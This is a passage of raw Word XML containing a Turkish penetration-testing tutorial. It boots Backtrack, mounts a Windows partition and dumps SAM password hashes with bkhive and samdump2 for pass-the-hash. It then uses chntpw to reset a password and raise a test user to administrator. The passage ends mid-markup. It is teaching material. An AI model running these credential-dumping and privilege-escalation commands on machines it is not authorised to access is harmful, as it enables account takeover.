    <w:p w14:paraId="073F83C0" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bilgisayarı Backtrack ile boot etmek için ilk olarak BIOS ayarlarına giriş yapılmalı ve boot sırası önce USB (veya CD/DVD'ye yazıldıysa CD/DVD) olacak şekilde ayarlanmalı ve kaydedilmelidir. BIOS ayarlarına giriş yapmak için markaya göre değişiklik göstermesine rağmen genelde F2, F10 veya F12 kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAE08CF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7194BF8B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Önbilgi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7285293C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Windows işletim sisteminin kullanıcı hesapları yönetimine kısaca bakmak gerekirse, kullanıcılara ait parola bilgisi hashli bir biçimde SAM adında bir dosyada tutulur. Bu dosya işletim sistemi çalışır vaziyette iken erişilemez bir dosyadır. Ancak işletim sisteminin kurulu olduğu hard disk bölümü Backtrack ile mount edilebilir ve SAM dosyasına bu şekilde erişilebilir.  Microsoft offline parola kırma işlemini zorlaştırmak için SYSKEY denilen bir fonksiyon ile SAM dosyasında hashli halde saklanan parolaları ekstradan şifreler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798BD8CE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pass-the-hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05095A57" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistem Backtrack ile boot edilmek üzere kapatılmıştır. BIOS ayarlarına erişilmiş ve boot sıralaması bilgisayar USB ile boot olacak şekilde ayarlanmıştır ve Backtrack ile boot edilmiştir. Açılışta UNetbootin menusü çıkmaktadır. Enter denilerek (Default) devam edilebilir. Ardından Backtrack işletim sistemi çalışmaya başlayacaktır. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root/toor</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanıcı bilgileriyle giriş yapılır ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>startx</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> komutuyla grafiksel arayüze ulaşılabilir. Burada bir terminal ekranı açılır. Türkçe karakterler ile sorun yaşamamak için önce </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB66B0" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">#setxkbmap tr </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FF58C9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>komutu çalıştırılır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>arak Türkçe klavyeye geçilebilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.Ardından </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFDF19B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">#fdisk -l </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2AB84C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>komutu ile hard disk bölümleri listelenir. Listede Windows hangi bölümde kurulu ise onun mount edilmesi gerekir. Bu deneme yanılma ile bulunabilir. Bu çalışmada Windows /dev/sda5 üzerinde tespit edilmiştir ve /root altına mount edilmiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DED3885" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="078A624C" wp14:editId="62E9A026">
            <wp:extent cx="5760720" cy="709266"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="154" name="Resim 154" descr="https://lh4.googleusercontent.com/_qUQFXWp2w_RgfnLBLEeIqi7huMSehsYlYEFPKw23R_qd70ma6TM642W0EF1-bFbzVjL6ihg2AlcGhM4JhV_CheF7kBMYgzTFr7p3L_Gw0Hr5TtlGmTC1pYw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qUQFXWp2w_RgfnLBLEeIqi7huMSehsYlYEFPKw23R_qd70ma6TM642W0EF1-bFbzVjL6ihg2AlcGhM4JhV_CheF7kBMYgzTFr7p3L_Gw0Hr5TtlGmTC1pYw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09266"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="609DF1FF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#mount /dev/sda5 /root/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2659BFDF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#cd /root/Windows/System32/config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2287A1" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Artık /root klasörü altına gelerek Windows dosyalarına erişilebilir (bazı sistemlerde System32 veya bunun gibi klasörlerde büyük-küçük harf farklılıkları olabilir). SAM dosyasını açmak için önce SYSKEY’e erişilir ve bu bir text dosyasına(bootkey.txt) yazılır. Bunun için bkhive aracı kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BA1F7A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37B1C7E4" wp14:editId="3A4E59DC">
            <wp:extent cx="5245100" cy="1328420"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="155" name="Resim 155" descr="https://lh5.googleusercontent.com/JCmxAv4Q3u6VpJI6vlxAK4wql7bIjJIzSG75vZDSkqWBmtHk-_xAmwXGh8Xs5aDaqQeE2uVqwFmpOmzrcsYdE1TEoK1vSu_62-MrV9xZWOv1Yu1fkQZpMhS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CmxAv4Q3u6VpJI6vlxAK4wql7bIjJIzSG75vZDSkqWBmtHk-_xAmwXGh8Xs5aDaqQeE2uVqwFmpOmzrcsYdE1TEoK1vSu_62-MrV9xZWOv1Yu1fkQZpMhSD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100" cy="1328420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06566C0E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C7C1BAB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ardından samdump2 aracı ile bootkey.txt içindeki SYSKEY kullanılarak SAM dosyası açılır. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E4D03" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#samdump2 SAM bootkey.txt &gt; samdump.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711D100E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ADA1334" wp14:editId="4B1F9A44">
            <wp:extent cx="5760720" cy="1005689"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="156" name="Resim 156" descr="https://lh5.googleusercontent.com/ElDN9UT03Lh-LZNqerzdFXe5e3PzEVCp1tCVB7zhL4dObypP5HTwtMeR5xk4QwKWHPNrW158_7DPd-JoSlUlHmJP6FK34oFKuaAQ70tb9BT80quWGCGKvmTv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lDN9UT03Lh-LZNqerzdFXe5e3PzEVCp1tCVB7zhL4dObypP5HTwtMeR5xk4QwKWHPNrW158_7DPd-JoSlUlHmJP6FK34oFKuaAQ70tb9BT80quWGCGKvmTv7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05689"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FDCA20" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Şekildeki gibi sistemdeki kullanıcılara ait hashlere ulaşılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3FD1D0" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="166DFD98" wp14:editId="14A6705C">
            <wp:extent cx="5760720" cy="725444"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="157" name="Resim 157" descr="https://lh3.googleusercontent.com/bGnnuA6rhgoC0IombqCBqH0DbRtgIyf9luTHj4p0JVMgpLdt0XQ74kO-E7Y081T4VoVrtaiHcSVsSbsptEf1GWs3gx-HnkMxfHw7aBqsgBjob9z6zJm_p3b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GnnuA6rhgoC0IombqCBqH0DbRtgIyf9luTHj4p0JVMgpLdt0XQ74kO-E7Y081T4VoVrtaiHcSVsSbsptEf1GWs3gx-HnkMxfHw7aBqsgBjob9z6zJm_p3bTy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25444"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74610E80" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bu şekilde alınan kullanıcı adı ve hash bilgisi ile pass-the-hash yapılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A763198" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3359800B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Parola sıfırlamak ve Yetki yükseltmek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B91E816" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Test amacıyla önce Windows işletim sisteminde yönetici yetkisi olmayan, parola korumalı BGA isimli standart bir kullanıcı oluşturulmuştur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77814F68" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50313F7B" wp14:editId="0C5D2528">
            <wp:extent cx="5374005" cy="1483995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="158" name="Resim 158" descr="https://lh6.googleusercontent.com/vZowZMglHWyeby6zswVvrtuu5xJlEkxYIcIcFB9uRdTFFO16ncEb1yfs2_VgyM5GmHvHp8AVbJu9keJVS1ZQIfFdmqPRqXLqKB75gSIxuVcypZ9YPGXyn3e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ZowZMglHWyeby6zswVvrtuu5xJlEkxYIcIcFB9uRdTFFO16ncEb1yfs2_VgyM5GmHvHp8AVbJu9keJVS1ZQIfFdmqPRqXLqKB75gSIxuVcypZ9YPGXyn3etz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005" cy="1483995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D04A8F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC91A80" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Parola sıfırlamak veya kullanıcıyı Administrators grubuna eklemek için chntpw aracı kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A9671" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>chntpw aracına ulaşmak için şekildeki yol izlenebilir(Bu çalışmada sistem /tmp klasörü altına mount edilmiştir. İstenilen yere mount edilebilir).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A1CEE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:r w:rsidRPr="00902B70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C673058" wp14:editId="4DB67E61">
            <wp:extent cx="5760720" cy="3371699"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="159" name="Resim 159" descr="https://lh5.googleusercontent.com/uukoIRiwgUBCs_ndnJTlpl4NkwDnOovv0C8dsmOsrnBo0PCx7MKZaBf1iWzOg9MszURd9j4Ipm8huupt-pJLk74rfeonDaQ2khb3bBEIhjUoLJypTp_FyRy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ukoIRiwgUBCs_ndnJTlpl4NkwDnOovv0C8dsmOsrnBo0PCx7MKZaBf1iWzOg9MszURd9j4Ipm8huupt-pJLk74rfeonDaQ2khb3bBEIhjUoLJypTp_FyRyAb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71699"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7674B2EB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Araç çalıştırılır, SAM dosyasının bulunduğu yol gösterilir ve “-l” ile kullanıcılar listelenir. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7600E71D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#./chntpw -l /tmp/Windows/System32/config/SAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF4C95" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D1B23FB" wp14:editId="45403EBB">
            <wp:extent cx="5760720" cy="2360759"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="160" name="Resim 160" descr="https://lh6.googleusercontent.com/DC1ai_iyuVz4SfknVeJUaqMrnjnDThUjJabRA0CEcLMJQ-yZ0gJ1eB_XkHmuSAdiZq6YEdZuIgp7yugUvRnkUHdEIAKv3Mr2xJLB2hYaE4FeOv4kNyVCRDiO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C1ai_iyuVz4SfknVeJUaqMrnjnDThUjJabRA0CEcLMJQ-yZ0gJ1eB_XkHmuSAdiZq6YEdZuIgp7yugUvRnkUHdEIAKv3Mr2xJLB2hYaE4FeOv4kNyVCRDiO7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60759"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F19AC26" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EDF43E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#./chntpw -u “BGA” /tmp/Windows/System32/config/SAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF981B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ile  kullanıcı için seçenekler listelenir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3B3CBE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CB37129" wp14:editId="1B091AF2">
            <wp:extent cx="5512435" cy="1009015"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="161" name="Resim 161" descr="https://lh3.googleusercontent.com/MiAXnKuZkcWRMSEkyoYHJW4U9HOZwYOvtmh5zKIhg42YWd0JRvGxQ65Fp_VL4VDSv3w9AndKB5soThXpQyRPdByTz4F3tD2fwAEjmtGPlVAj5yPfOrwfcxD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iAXnKuZkcWRMSEkyoYHJW4U9HOZwYOvtmh5zKIhg42YWd0JRvGxQ65Fp_VL4VDSv3w9AndKB5soThXpQyRPdByTz4F3tD2fwAEjmtGPlVAj5yPfOrwfcxDU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2435" cy="1009015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21962575" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1827CA94" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Parola sıfırlamak için 1, yetki yükseltmek için 3 çalıştırılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499357C5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1 seçildiğinde aşağıdaki gibi bir sonuç çıkar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349B0FC3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
